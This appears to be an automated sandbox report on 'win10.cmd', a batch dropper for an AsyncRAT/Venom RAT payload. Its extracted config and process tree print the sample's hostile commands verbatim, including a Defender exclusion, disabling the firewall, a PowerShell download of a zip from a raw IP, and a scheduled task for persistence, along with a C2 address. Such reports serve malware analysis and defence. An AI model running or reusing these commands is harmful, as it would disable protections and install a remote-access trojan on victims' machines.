Analysis
- max time kernel: 64s
- max time network: 65s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- submitted: 25-10-2024 13:59

Static task: static1

Behavioral task: behavioral1
  Sample: win10.cmd
  Resource: win7-20240729-en

Behavioral task: behavioral2
  Sample: win10.cmd
  Resource: win10v2004-20241007-en
General
- Target: win10.cmd
- Size: 3KB
- MD5: e62a670dce5171d5ffc8cdc9d1897f1e
- SHA1: 1f1641255d816783f7eac72f7359dd886ddaa164
- SHA256: 37e3fb24bc4ea36c7363a55ca99539a5c91aa5600739a652deb3fbbbcab9b2d5
- SHA512: f7615a367da1bfabc4cf9fad782154342c14bca6cca448b493cc3ee0328c1267f6b91beeb6e12ece409b72429eb9bb23154aaa682cb49157867b5d3c593d4557
Malware Config
Extracted: http://72.5.43.223/gdHydhxad/win10.zip
Extracted: asyncrat
  Venom RAT + HVNC + Stealer + Grabber v6.0.2
  Default
  72.5.43.15:4449
  yezcydjwbxouz
  - delay: 1
  - install: true
  - install_file: win.exe
  - install_folder: %AppData%
Signatures
- Asyncrat family
- Async RAT payload (1 IoC)
  Processes:
    resource: C:\Users\Admin\AppData\Local\Temp\runtime.exe, yara_rule: family_asyncrat
- Blocklisted process makes network request (1 IoC)
  Processes:
    flow 4, pid 1640, powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  Processes:
    pid 2396 powershell.exe
    pid 2472 powershell.exe
    pid 1640 powershell.exe
    pid 2252 powershell.exe
- Modifies Windows Firewall (2 TTPs, 1 IoC)
  Processes:
    pid 2768 netsh.exe
- Executes dropped EXE (5 IoCs)
  Processes:
    pid 1396 runtime.exe
    pid 1976 win10.exe
    pid 2960 win10.exe
    pid 1208
    pid 1452 win.exe
- Loads dropped DLL (4 IoCs)
  Processes:
    pid 2676 cmd.exe
    pid 1976 win10.exe
    pid 2960 win10.exe
    pid 1208
- Processes:
    resource: behavioral1/memory/2960-165-0x000007FEF2DE0000-0x000007FEF3246000-memory.dmp, yara_rule: upx
    resource: \Users\Admin\AppData\Local\Temp\_MEI19762\python310.dll, yara_rule: upx
- Detects Pyinstaller (1 IoC)
  Processes:
    resource: C:\Users\Admin\AppData\Local\Temp\win10.exe, yara_rule: pyinstaller
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  Processes:
    Key opened: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
    Key queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
    Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh (netsh.exe)
- Delays execution with timeout.exe (1 IoC)
  Processes:
    pid 1256 timeout.exe
- Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Suspicious behavior: EnumeratesProcesses (11 IoCs)
  Processes:
    pid 2396 powershell.exe
    pid 2472 powershell.exe
    pid 2252 powershell.exe
    pid 1640 powershell.exe
    pid 1396 runtime.exe (3 entries)
    pid 1452 win.exe (4 entries)
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes:
    Token: SeDebugPrivilege, pid 2396 powershell.exe
    Token: SeDebugPrivilege, pid 2472 powershell.exe
    Token: SeDebugPrivilege, pid 2252 powershell.exe
    Token: SeDebugPrivilege, pid 1640 powershell.exe
    Token: SeDebugPrivilege, pid 1396 runtime.exe
    Token: SeDebugPrivilege, pid 1452 win.exe
- Suspicious use of FindShellTrayWindow (1 IoC)
  Processes:
    pid 2080 cscript.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes:
    pid 1452 win.exe
- Suspicious use of WriteProcessMemory (51 IoCs)
  Processes (each of the 17 parent/target pairs below is recorded three times):
    PID 1916 cmd.exe wrote to memory of 2300 cacls.exe
    PID 1916 cmd.exe wrote to memory of 2396 powershell.exe
    PID 1916 cmd.exe wrote to memory of 2472 powershell.exe
    PID 2472 powershell.exe wrote to memory of 2768 netsh.exe
    PID 1916 cmd.exe wrote to memory of 2252 powershell.exe
    PID 1916 cmd.exe wrote to memory of 2660 cscript.exe
    PID 2660 cscript.exe wrote to memory of 2676 cmd.exe
    PID 2676 cmd.exe wrote to memory of 1640 powershell.exe
    PID 2676 cmd.exe wrote to memory of 2080 cscript.exe
    PID 2676 cmd.exe wrote to memory of 1396 runtime.exe
    PID 2676 cmd.exe wrote to memory of 1976 win10.exe
    PID 1976 win10.exe wrote to memory of 2960 win10.exe
    PID 1396 runtime.exe wrote to memory of 1908 cmd.exe
    PID 1396 runtime.exe wrote to memory of 2548 cmd.exe
    PID 1908 cmd.exe wrote to memory of 1084 schtasks.exe
    PID 2548 cmd.exe wrote to memory of 1256 timeout.exe
    PID 2548 cmd.exe wrote to memory of 1452 win.exe
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
- Uses Volume Shadow Copy WMI provider
  The Volume Shadow Copy service is used to manage backups/snapshots.
- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes (indentation and depth number show the parent/child tree)

[depth 1] C:\Windows\system32\cmd.exe
  command: cmd /c "C:\Users\Admin\AppData\Local\Temp\win10.cmd"
  - Suspicious use of WriteProcessMemory
  PID: 1916

  [depth 2] C:\Windows\system32\cacls.exe
    command: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    PID: 2300

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2396

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command: powershell.exe -command "netsh advfirewall set allprofiles state off"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2472

    [depth 3] C:\Windows\system32\netsh.exe
      command: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      PID: 2768

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command: Powershell -Command "Invoke-Webrequest 'www.google.nl' -OutFile C:\Users\Admin\AppData\Local\Temp\tmp.nl"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2252

  [depth 2] C:\Windows\system32\cscript.exe
    command: cscript /nologo C:\Users\Admin\AppData\Local\Temp\temprunner.vbs
    - Suspicious use of WriteProcessMemory
    PID: 2660

    [depth 3] C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\batman.cmd
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 2676

      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: powershell -Command "(New-Object Net.WebClient).DownloadFile('http://72.5.43.223/gdHydhxad/win10.zip', 'C:\Users\Admin\AppData\Local\Temp/win10.zip')"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1640

      [depth 4] C:\Windows\system32\cscript.exe
        command: cscript //nologo "C:\Users\Admin\AppData\Local\Temp\unzi.vbs"
        - Suspicious use of FindShellTrayWindow
        PID: 2080

      [depth 4] C:\Users\Admin\AppData\Local\Temp\runtime.exe
        command: "C:\Users\Admin\AppData\Local\Temp\runtime.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 1396

        [depth 5] C:\Windows\System32\cmd.exe
          command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "win" /tr '"C:\Users\Admin\AppData\Roaming\win.exe"' & exit
          - Suspicious use of WriteProcessMemory
          PID: 1908

          [depth 6] C:\Windows\system32\schtasks.exe
            command: schtasks /create /f /sc onlogon /rl highest /tn "win" /tr '"C:\Users\Admin\AppData\Roaming\win.exe"'
            - Scheduled Task/Job: Scheduled Task
            PID: 1084

        [depth 5] C:\Windows\system32\cmd.exe
          command: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE0ED.tmp.bat""
          - Suspicious use of WriteProcessMemory
          PID: 2548

          [depth 6] C:\Windows\system32\timeout.exe
            command: timeout 3
            - Delays execution with timeout.exe
            PID: 1256

          [depth 6] C:\Users\Admin\AppData\Roaming\win.exe
            command: "C:\Users\Admin\AppData\Roaming\win.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
            PID: 1452

      [depth 4] C:\Users\Admin\AppData\Local\Temp\win10.exe
        command: "C:\Users\Admin\AppData\Local\Temp\win10.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        PID: 1976

        [depth 5] C:\Users\Admin\AppData\Local\Temp\win10.exe
          command: "C:\Users\Admin\AppData\Local\Temp\win10.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 2960
Network

MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Create or Modify System Process (1)
    Windows Service (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Downloads